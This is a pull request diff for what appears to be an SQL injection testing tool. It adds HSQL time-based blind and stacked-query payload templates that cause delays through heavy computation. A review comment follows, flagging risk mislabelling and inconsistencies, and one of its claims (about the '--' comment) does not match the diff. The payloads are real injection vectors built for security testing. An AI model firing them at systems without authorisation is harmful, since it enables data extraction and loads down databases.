Merge pull request #475 from Meatballs1/hsql_clean

HSQL Payloads and Query Support
Miroslav Stampar
2013-07-01 02:38:04 -07:00
17 changed files with 764 additions and 10 deletions


@@ -1127,7 +1127,6 @@ Formats:
</test>
<!-- End of stacked conditional-error blind queries tests -->
<!-- Error-based tests - WHERE or HAVING clause -->
<test>
<title>MySQL &gt;= 5.0 AND error-based - WHERE or HAVING clause</title>
@@ -1878,7 +1877,6 @@ Formats:
-->
<!-- End of error-based tests - GROUP BY and ORDER BY clauses -->
<!-- Inline queries tests -->
<test>
<title>MySQL inline queries</title>
@@ -1996,7 +1994,6 @@ Formats:
</test>
<!-- End of inline queries tests -->
<!-- Stacked queries tests -->
<test>
<title>MySQL &gt; 5.0.11 stacked queries</title>
@@ -2245,6 +2242,48 @@ Formats:
<dbms_version>&gt;= 2.0</dbms_version>
</details>
</test>
<test>
<title>HSQL &gt;= 1.7.2 Server stacked queries</title>
<stype>4</stype>
<level>1</level>
<risk>0</risk>
<clause>0</clause>
<where>1</where>
<vector>;CALL CASE WHEN ([INFERENCE]) THEN REPEAT(RIGHT(CHAR([RANDNUM]),0),[SLEEPTIME]00000000) END</vector>
<request>
<payload>;CALL REPEAT(RIGHT(CHAR([RANDNUM]),0),[SLEEPTIME]00000000)</payload>
<comment>--</comment>
</request>
<response>
<time>[SLEEPTIME]</time>
</response>
<details>
<dbms>HSQL</dbms>
<dbms_version>&gt;= 1.7.2</dbms_version>
</details>
</test>
<test>
<title>HSQL &gt;= 2.0 Server stacked queries</title>
<stype>4</stype>
<level>1</level>
<risk>0</risk>
<clause>0</clause>
<where>1</where>
<vector>;CALL CASE WHEN ([INFERENCE]) THEN REPEAT(LEFT(CRYPT_KEY('AES',null),0),[SLEEPTIME]00000000) END</vector>
<request>
<payload>;CALL REPEAT(LEFT(CRYPT_KEY('AES',null),0),[SLEEPTIME]00000000)</payload>
<comment>--</comment>
</request>
<response>
<time>[SLEEPTIME]</time>
</response>
<details>
<dbms>HSQL</dbms>
<dbms_version>&gt;= 2.0</dbms_version>
</details>
</test>
<!-- TODO: if possible, add payload for Microsoft Access and SAP MaxDB -->
<!-- End of stacked queries tests -->
@@ -2712,6 +2751,88 @@ Formats:
<dbms>IBM DB2</dbms>
</details>
</test>
<test>
<title>HSQL &gt;= 1.7.2 AND time-based blind (heavy query)</title>
<stype>5</stype>
<level>2</level>
<risk>2</risk>
<clause>1,2,3</clause>
<where>1</where>
<vector>AND '[RANDSTR]'=CASE WHEN ([INFERENCE]) THEN REPEAT(RIGHT(CHAR([RANDNUM]),0),[SLEEPTIME]000000000) ELSE '[RANDSTR]' END</vector>
<request>
<payload>AND '[RANDSTR]'=REPEAT(RIGHT(CHAR([RANDNUM]),0),[SLEEPTIME]000000000)</payload>
</request>
<response>
<time>[SLEEPTIME]</time>
</response>
<details>
<dbms>HSQL</dbms>
<dbms_version>&gt;= 1.7.2</dbms_version>
</details>
</test>
<test>
<title>HSQL &gt;= 1.7.2 AND time-based blind (heavy query - comment)</title>
<stype>5</stype>
<level>5</level>
<risk>2</risk>
<clause>1,2,3</clause>
<where>1</where>
<vector>AND '[RANDSTR]'=CASE WHEN ([INFERENCE]) THEN REPEAT(RIGHT(CHAR([RANDNUM]),0),[SLEEPTIME]000000000) ELSE '[RANDSTR]' END</vector>
<request>
<payload>AND '[RANDSTR]'=REPEAT(RIGHT(CHAR([RANDNUM]),0),[SLEEPTIME]000000000)</payload>
<comment>--</comment>
</request>
<response>
<time>[DELAYED]</time>
</response>
<details>
<dbms>HSQL</dbms>
<dbms_version>&gt;= 1.7.2</dbms_version>
</details>
</test>
<test>
<title>HSQL &gt; 2.0 AND time-based blind (heavy query)</title>
<stype>5</stype>
<level>2</level>
<risk>2</risk>
<clause>1,2,3</clause>
<where>1</where>
<vector>AND '[RANDSTR]'=CASE WHEN ([INFERENCE]) THEN REPEAT(LEFT(CRYPT_KEY('AES',null),0),[SLEEPTIME]00000000) ELSE '[RANDSTR]' END</vector>
<request>
<payload>AND '[RANDSTR]'=REPEAT(LEFT(CRYPT_KEY('AES',null),0),[SLEEPTIME]00000000)</payload>
</request>
<response>
<time>[SLEEPTIME]</time>
</response>
<details>
<dbms>HSQL</dbms>
<dbms_version>&gt; 2.0</dbms_version>
</details>
</test>
<test>
<title>HSQL &gt; 2.0 AND time-based blind (heavy query - comment)</title>
<stype>5</stype>
<level>5</level>
<risk>2</risk>
<clause>1,2,3</clause>
<where>1</where>
<vector>AND '[RANDSTR]'=CASE WHEN ([INFERENCE]) THEN REPEAT(LEFT(CRYPT_KEY('AES',null),0),[SLEEPTIME]00000000) ELSE '[RANDSTR]' END</vector>
<request>
<payload>AND '[RANDSTR]'=REPEAT(LEFT(CRYPT_KEY('AES',null),0),[SLEEPTIME]00000000)</payload>
<comment>--</comment>
</request>
<response>
<time>[DELAYED]</time>
</response>
<details>
<dbms>HSQL</dbms>
<dbms_version>&gt; 2.0</dbms_version>
</details>
</test>
<!-- TODO: if possible, add payload for Microsoft Access -->
<!-- End of AND time-based blind tests -->
@@ -2931,6 +3052,88 @@ Formats:
<dbms>IBM DB2</dbms>
</details>
</test>
<test>
<title>HSQL &gt;= 1.7.2 OR time-based blind (heavy query)</title>
<stype>5</stype>
<level>2</level>
<risk>2</risk>
<clause>1,2,3</clause>
<where>1</where>
<vector>OR '[RANDSTR]'=CASE WHEN ([INFERENCE]) THEN REPEAT(RIGHT(CHAR([RANDNUM]),0),[SLEEPTIME]000000000) ELSE '[RANDSTR]' END</vector>
<request>
<payload>OR '[RANDSTR]'=REPEAT(RIGHT(CHAR([RANDNUM]),0),[SLEEPTIME]000000000)</payload>
</request>
<response>
<time>[SLEEPTIME]</time>
</response>
<details>
<dbms>HSQL</dbms>
<dbms_version>&gt;= 1.7.2</dbms_version>
</details>
</test>
<test>
<title>HSQL &gt;= 1.7.2 OR time-based blind (heavy query - comment)</title>
<stype>5</stype>
<level>5</level>
<risk>2</risk>
<clause>1,2,3</clause>
<where>1</where>
<vector>OR '[RANDSTR]'=CASE WHEN ([INFERENCE]) THEN REPEAT(RIGHT(CHAR([RANDNUM]),0),[SLEEPTIME]000000000) ELSE '[RANDSTR]' END</vector>
<request>
<payload>OR '[RANDSTR]'=REPEAT(RIGHT(CHAR([RANDNUM]),0),[SLEEPTIME]000000000)</payload>
<comment>--</comment>
</request>
<response>
<time>[DELAYED]</time>
</response>
<details>
<dbms>HSQL</dbms>
<dbms_version>&gt;= 1.7.2</dbms_version>
</details>
</test>
<test>
<title>HSQL &gt; 2.0 OR time-based blind (heavy query)</title>
<stype>5</stype>
<level>2</level>
<risk>2</risk>
<clause>1,2,3</clause>
<where>1</where>
<vector>OR '[RANDSTR]'=CASE WHEN ([INFERENCE]) THEN REPEAT(LEFT(CRYPT_KEY('AES',null),0),[SLEEPTIME]00000000) ELSE '[RANDSTR]' END</vector>
<request>
<payload>OR '[RANDSTR]'=REPEAT(LEFT(CRYPT_KEY('AES',null),0),[SLEEPTIME]00000000)</payload>
</request>
<response>
<time>[SLEEPTIME]</time>
</response>
<details>
<dbms>HSQL</dbms>
<dbms_version>&gt; 2.0</dbms_version>
</details>
</test>
<test>
<title>HSQL &gt; 2.0 OR time-based blind (heavy query - comment)</title>
<stype>5</stype>
<level>5</level>
<risk>2</risk>
<clause>1,2,3</clause>
<where>1</where>
<vector>OR '[RANDSTR]'=CASE WHEN ([INFERENCE]) THEN REPEAT(LEFT(CRYPT_KEY('AES',null),0),[SLEEPTIME]00000000) ELSE '[RANDSTR]' END</vector>
<request>
<payload>OR '[RANDSTR]'=REPEAT(LEFT(CRYPT_KEY('AES',null),0),[SLEEPTIME]00000000)</payload>
<comment>--</comment>
</request>
<response>
<time>[DELAYED]</time>
</response>
<details>
<dbms>HSQL</dbms>
<dbms_version>&gt; 2.0</dbms_version>
</details>
</test>
<!-- TODO: if possible, add payload for Microsoft Access -->
<!-- End of OR time-based blind tests -->
@@ -3211,7 +3414,7 @@ Formats:
</test>
<test>
<title>IBM DB2 AND time-based blind (heavy query)</title>
<title>IBM DB2 time-based blind - Parameter replace (heavy query)</title>
<stype>5</stype>
<level>5</level>
<risk>2</risk>
@@ -3228,6 +3431,47 @@ Formats:
<dbms>IBM DB2</dbms>
</details>
</test>
<!-- Untested -->
<test>
<title>HSQL &gt;= 1.7.2 time-based blind - Parameter replace (heavy query)</title>
<stype>5</stype>
<level>2</level>
<risk>2</risk>
<clause>1,2,3</clause>
<where>1</where>
<vector>(SELECT (CASE WHEN ([INFERENCE]) THEN REPEAT(RIGHT(CHAR([RANDNUM]),0),[SLEEPTIME]00000000) ELSE '[RANDSTR]' END) FROM INFORMATION_SCHEMA.SYSTEM_USERS)</vector>
<request>
<payload>(SELECT (CASE WHEN ([RANDNUM]=[RANDNUM]) THEN REPEAT(RIGHT(CHAR([RANDNUM]),0),[SLEEPTIME]00000000) ELSE '[RANDSTR]' END) FROM INFORMATION_SCHEMA.SYSTEM_USERS)</payload>
</request>
<response>
<time>[SLEEPTIME]</time>
</response>
<details>
<dbms>HSQL</dbms>
<dbms_version>&gt;= 1.7.2</dbms_version>
</details>
</test>
<test>
<title>HSQL &gt; 2.0 time-based blind - Parameter replace (heavy query)</title>
<stype>5</stype>
<level>2</level>
<risk>2</risk>
<clause>1,2,3</clause>
<where>1</where>
<vector>(SELECT (CASE WHEN ([INFERENCE]) THEN REPEAT(LEFT(CRYPT_KEY('AES',null),0),[SLEEPTIME]00000000) ELSE '[RANDSTR]' END) FROM (VALUES(0)))</vector>
<request>
<payload>(SELECT (CASE WHEN ([RANDNUM]=[RANDNUM]) THEN REPEAT(LEFT(CRYPT_KEY('AES',null),0),[SLEEPTIME]00000000) ELSE '[RANDSTR]' END) FROM (VALUES(0)))</payload>
</request>
<response>
<time>[SLEEPTIME]</time>
</response>
<details>
<dbms>HSQL</dbms>
<dbms_version>&gt; 2.0</dbms_version>
</details>
</test>
<!-- End of time-based blind tests - Parameter replace -->
@@ -3389,6 +3633,47 @@ Formats:
<dbms>Oracle</dbms>
</details>
</test>
<test>
<title>HSQL &gt;= 1.7.2 time-based blind - GROUP BY and ORDER BY clauses (heavy query)</title>
<stype>5</stype>
<level>4</level>
<risk>2</risk>
<clause>2,3</clause>
<where>1</where>
<vector>,(SELECT (CASE WHEN ([INFERENCE]) THEN (ASCII(REPEAT(RIGHT(CHAR([RANDNUM]),0),[SLEEPTIME]00000000))) ELSE [RANDNUM]/(SELECT 0 FROM INFORMATION_SCHEMA.SYSTEM_USERS) END) FROM INFORMATION_SCHEMA.SYSTEM_USERS)</vector>
<request>
<payload>,(SELECT (CASE WHEN ([RANDNUM]=[RANDNUM]) THEN (ASCII(REPEAT(RIGHT(CHAR([RANDNUM]),0),[SLEEPTIME]00000000))) ELSE [RANDNUM]/(SELECT 0 FROM INFORMATION_SCHEMA.SYSTEM_USERS) END) FROM INFORMATION_SCHEMA.SYSTEM_USERS)</payload>
<comment>--</comment>
</request>
<response>
<time>[DELAYED]</time>
</response>
<details>
<dbms>HSQL</dbms>
<dbms_version>&gt;= 1.7.2</dbms_version>
</details>
</test>
<test>
<title>HSQL &gt; 2.0 time-based blind - GROUP BY and ORDER BY clauses (heavy query)</title>
<stype>5</stype>
<level>4</level>
<risk>2</risk>
<clause>2,3</clause>
<where>1</where>
<vector>,(SELECT (CASE WHEN ([INFERENCE]) THEN (ASCII(REPEAT(LEFT(CRYPT_KEY('AES',null),0),[SLEEPTIME]00000000))) ELSE [RANDNUM]/(SELECT 0 FROM (VALUES(0))) END) FROM (VALUES(0)))</vector>
<request>
<payload>,(SELECT (CASE WHEN ([RANDNUM]=[RANDNUM]) THEN (ASCII(REPEAT(LEFT(CRYPT_KEY('AES',null),0),[SLEEPTIME]00000000))) ELSE [RANDNUM]/(SELECT 0 FROM (VALUES(0))) END) FROM (VALUES(0)))</payload>
</request>
<response>
<time>[DELAYED]</time>
</response>
<details>
<dbms>HSQL</dbms>
<dbms_version>&gt; 2.0</dbms_version>
</details>
</test>
<!-- TODO: if possible, add payload for Microsoft Access -->
<!-- End of time-based blind tests - GROUP BY and ORDER BY clause -->
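Review bot: The two new stacked-queries tests ("HSQL >= 1.7.2 Server stacked queries" and "HSQL >= 2.0 Server stacked queries") are tagged `<level>1</level>` / `<risk>0</risk>` and have no "(heavy query)" in their titles, yet they get their delay from the same `REPEAT(...,[SLEEPTIME]00000000)` load as the tests this change marks `<risk>2</risk>`. A scan at low level and risk settings would therefore presumably put CPU and memory pressure on the database under test without the operator opting in. I would retitle them "... stacked queries (heavy query)" and use `<risk>2</risk>`, matching the other HSQL heavy-query entries. The new entries also disagree with each other: the >= 1.7.2 AND/OR tests multiply by `[SLEEPTIME]000000000` (nine zeros) where every other test uses eight, tests sharing a payload differ between `<time>[SLEEPTIME]</time>` and `<time>[DELAYED]</time>`, only the >= 1.7.2 GROUP BY/ORDER BY test carries `<comment>--</comment>`, and the version bound is `>= 2.0` in the stacked tests but `> 2.0` elsewhere. The block under `<!-- Untested -->` ships at level 2, so I would raise its level until it is verified and add a comment such as `<!-- HSQL heavy-query tests: delay comes from server load, not a sleep call; may affect availability of the tested database -->`.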